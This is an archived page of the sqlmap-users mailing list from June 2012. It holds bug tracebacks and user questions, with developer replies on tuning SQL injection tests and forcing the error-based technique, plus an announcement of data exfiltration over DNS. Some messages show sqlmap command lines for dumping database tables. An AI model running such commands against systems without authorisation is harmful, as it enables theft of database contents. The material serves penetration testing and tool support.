sqlmap version: 1.0-dev (r5112) Python version: 2.6.6 Operating system: posix Command line: sqlmap.py --url ********************************************************************************************************************************************************************************* -D ************* --thread=10 -T ********* --dump --random-agent Technique: UNION Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "/root/sqlmap/_sqlmap.py", line 81, in main start() File "/root/sqlmap/lib/controller/controller.py", line 573, in start action() File "/root/sqlmap/lib/controller/action.py", line 109, in action conf.dbmsHandler.dumpTable() File "/root/sqlmap/plugins/generic/enumeration.py", line 1635, in dumpTable for entry in entries: File "/root/sqlmap/lib/core/bigarray.py", line 90, in __iter__ yield self[i] File "/root/sqlmap/lib/core/bigarray.py", line 71, in __getitem__ self._checkcache(index) File "/root/sqlmap/lib/core/bigarray.py", line 62, in _checkcache self.cache = (index, pickle.load(fp), False) File "/usr/lib/python2.6/pickle.py", line 1370, in load return Unpickler(file).load() File "/usr/lib/python2.6/pickle.py", line 858, in load dispatch[key](self) File "/usr/lib/python2.6/pickle.py", line 1165, in load_put self.memo[self.readline()[:-1]] = self.stack[-1] MemoryError [*] shutting down at 23:10:30 |
From: Miroslav S. <mir...@gm...> - 2012-06-13 22:42:34
|
Hi Yori. "With that in mind it makes sense to be able to specify a test/payload combination that you have found and you know is working." We already have two mechanisms for such thing: 1) --prefix/--suffix where you can specify what are the prefix and suffix of SQL injection vector (e.g. --prefix="'" --suffix="-- " ) 2) --test-filter (hidden this moment) where you can target a specific test by it's name or payload (e.g. --test-filter="ROW" would trigger MySQL error-based injection test based on old ROW(..,..)>... technique) Now, please, if you have something other on your mind please tell so we could discuss and maybe find some other mechanism (if those 2 don't satisfy your needs) Kind regards, Miroslav Stampar On Wed, Jun 13, 2012 at 10:19 PM, Yori Kvitchko < yo...@co...> wrote: > Hey Everyone, > > New to the list but have been using sqlmap for a while now. I recently > participated in a CTF with an interesting blind, filter bypass sql > injection. Lots of restrictions. I set a challenge for myself to solve > it using sqlmap and managed to get it working with some effort. Of the > changes I had to make to get it to work included modifications to > queries.xml as well as specific arguments, but most of what I'm going to > request here is about payloads.xml. > > In trying to solve the challenge, I realized I needed to make sqlmap > laser focus on a single test. This was both for false negative > reduction, number of queries sent, and time limit. I did this myself by > removing every other test from payloads.xml but it brought to mind the > idea of being able to specify a test via command line arguments. You can > specify pretty much everything else on the command line, so the added > granularity would be nice. > > My philosophy on sql injection is that testing for it should be done > manually, then once found, get a tool like sqlmap to work with it and > perform all the time consuming brute forcing work for you. With that in > mind it makes sense to be able to specify a test/payload combination > that you have found and you know is working. > > Thanks for your consideration. Excellent work on the tool. > > - Yori > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Yori K. <yo...@co...> - 2012-06-13 20:50:04
|
Hey Everyone, New to the list but have been using sqlmap for a while now. I recently participated in a CTF with an interesting blind, filter bypass sql injection. Lots of restrictions. I set a challenge for myself to solve it using sqlmap and managed to get it working with some effort. Of the changes I had to make to get it to work included modifications to queries.xml as well as specific arguments, but most of what I'm going to request here is about payloads.xml. In trying to solve the challenge, I realized I needed to make sqlmap laser focus on a single test. This was both for false negative reduction, number of queries sent, and time limit. I did this myself by removing every other test from payloads.xml but it brought to mind the idea of being able to specify a test via command line arguments. You can specify pretty much everything else on the command line, so the added granularity would be nice. My philosophy on sql injection is that testing for it should be done manually, then once found, get a tool like sqlmap to work with it and perform all the time consuming brute forcing work for you. With that in mind it makes sense to be able to specify a test/payload combination that you have found and you know is working. Thanks for your consideration. Excellent work on the tool. - Yori |
From: Bernardo D. A. G. <ber...@gm...> - 2012-06-13 11:53:48
|
We have recently implemented data retrieval over DNS in sqlmap. This data exfiltration technique adds up to the six existing techniques already implemented: boolean-based blind, time-based blind, full UNION, partial UNION, error-based and stacked (nested) queries. It is supported on Oracle (running either on UNIX/Linux or Windows) and Microsoft SQL Server/MySQL/PostgreSQL (running on Windows). The technique can be tested for and used by providing sqlmap with the --dns-domain switch following a hostname that resolves over the Internet to the machine where you are running sqlmap from – you do not need to run your name server daemon so you can use a freely available DynDNS or similar solutions: sqlmap starts a fake DNS server on 53/udp so you need to run it with uid=0 privileges and handles the DNS requests from the target DBMS (actually from the DMZ’s DNS server misconfigured to resolve Internet hostnames) automatically. In cases where the target parameter is vulnerable and exploitable by either of the blind techniques or both of them, then sqlmap will test for DNS exfiltration too and prefer it over the blind techniques as it is much faster. Needless to say that both error-based and UNION based techniques are preferred if identified exploitable. The paper and slide-deck presented recently at PHDays conference in Moscow, Russia are available on my Miroslav's Slideshare page[1]: * Data Retrieval over DNS in SQL Injection Attacks[2] paper. * DNS exfiltration using sqlmap[3] (particularly slide 12 onwards if you plan on using sqlmap for this purpose). I recommend you all run always sqlmap latest development version from its Subversion repository: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev cd sqlmap-dev python sqlmap.py -h You can follow the sqlmap development on Twitter too, @sqlmap[4]. [1] http://www.slideshare.net/stamparm/ [2] http://www.slideshare.net/stamparm/ph-days-2012miroslavstampardataretrievaloverdnsinsqlinjectionattackspaper [3] http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281 [4] http://twitter.com/sqlmap -- Bernardo Damele A. G. Homepage: http://about.me/inquis E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
From: Miroslav S. <mir...@gm...> - 2012-06-13 10:44:41
|
Hi Adi. Could you please send a console output for that case? Kind regards, Miroslav Stampar On Wed, Jun 13, 2012 at 11:14 AM, Adi Mutu <adi...@ya...> wrote: > Hello, > > I'm using sqlmap in a pentest on a mssql 2000, and it only detects one > column type from a table of 21 columns. > The detected type is nvarchar.the others i think are some binary, text etc. > > Thanks, > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Adi M. <adi...@ya...> - 2012-06-13 09:14:16
|
Hello, I'm using sqlmap in a pentest on a mssql 2000, and it only detects one column type from a table of 21 columns. The detected type is nvarchar.the others i think are some binary, text etc. Thanks, |
From: Miroslav S. <mir...@gm...> - 2012-06-12 09:22:49
|
Hi Nico. Please update to the latest revision (v1.0-dev r5111) from our repository to have it fixed and up to date (you are currently using pretty outdated version): svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Kind regards, Miroslav Stampar On Wed, Jun 6, 2012 at 9:07 AM, Nico Montezco <nic...@ho...>wrote: > > Estimates. > > I've been porbando sqlmap tool and I came out this error when doing a " > DUMP" to a certain columns of a table here I hit the error: > > > *sqlmap version: 0.8-rc4 > Python version: 2.5.2 > Operating system: linux2 > Traceback (most recent call last): > File "sqlmap.py", line 80, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 259, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 114, in > action > dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 1320, in dumpTable > value = inject.getValue(query, inband=False) > File "/pentest/database/sqlmap/lib/request/inject.py", line 373, in > getValue > value = __goInferenceProxy(expression, fromUser, expected, batch, > resumeValue, unpack, charsetType, firstChar, lastChar) > File "/pentest/database/sqlmap/lib/request/inject.py", line 123, in > __goInferenceProxy > output = resume(expression, payload) > File "/pentest/database/sqlmap/lib/utils/resume.py", line 143, in resume > if len(resumedValue) == int(length): > ValueError: invalid literal for int() with base 10: '\x1f\x11' > > [*] shutting down at: 19:39:46* > > > Sorry my English is very bad i¡m From Spain. > > Thank U! > > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Iago S. <146...@gm...> - 2012-06-11 22:01:31
|
Thank you Miroslav, I didn't know it. On Jun 11, 2012 6:06 PM, "Miroslav Stampar" <mir...@gm...> wrote: Hi all. This was solved in private conversation but I would like to appeal to all of you there which tend to read this kind of messages. When you can choose between techniques, especially like in this case (UNION and ERROR techniques were usable), and one technique fails please try to force another one (e.g. --technique=E). In Iago's case server had some limitation in number of retrieved characters making UNION dumping unusable (whole row contents were retrieved per one request) for large strings. But, in case of ERROR technique, where record by record is being retrieved, it became usable (--technique=E). Kind regards, Miroslav Stampar On Mon, Jun 11, 2012 at 8:15 PM, Iago Sousa <146...@gm...> wrote: > > > > Hi there, > > why when I'm retrieving data sometimes the sqlmap don't show anything? > > > > Always th... > > > > ------------------------------------------------------------------------------ > > Live Security Vir... > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-06-11 21:06:56
|
Hi all. This was solved in private conversation but I would like to appeal to all of you there which tend to read this kind of messages. When you can choose between techniques, especially like in this case (UNION and ERROR techniques were usable), and one technique fails please try to force another one (e.g. --technique=E). In Iago's case server had some limitation in number of retrieved characters making UNION dumping unusable (whole row contents were retrieved per one request) for large strings. But, in case of ERROR technique, where record by record is being retrieved, it became usable (--technique=E). Kind regards, Miroslav Stampar On Mon, Jun 11, 2012 at 8:15 PM, Iago Sousa <146...@gm...> wrote: > Hi there, > why when I'm retrieving data sometimes the sqlmap don't show anything? > > Always the last print is upon char encoding detected by heuristics. > > -- > Regards, > Iago Sousa > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-06-11 18:23:54
|
Hi Iago. Some more data would be great :) Please give some more details. It's hard to find bugs for 'sometimes' cases. Traffic file, console output up to that point,... Kind regards, Miroslav Stampar On Jun 11, 2012 8:16 PM, "Iago Sousa" <146...@gm...> wrote: > Hi there, > why when I'm retrieving data sometimes the sqlmap don't show anything? > > Always the last print is upon char encoding detected by heuristics. > > -- > Regards, > Iago Sousa > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Iago S. <146...@gm...> - 2012-06-11 18:15:40
|
Hi there, why when I'm retrieving data sometimes the sqlmap don't show anything? Always the last print is upon char encoding detected by heuristics. -- Regards, Iago Sousa |
From: Miroslav S. <mir...@gm...> - 2012-06-07 08:38:22
|
Hi Zaki. We can put it on a TODO list (our option/switch list is getting huge :) and report back when implemented Kind regards On Thu, Jun 7, 2012 at 5:47 AM, Zaki Akhmad <zak...@gm...> wrote: > Danke, Miroslav! Can I issue a ticket for this feature? > > Regards, > -- > Zaki Akhmad > -- Miroslav Stampar http://about.me/stamparm |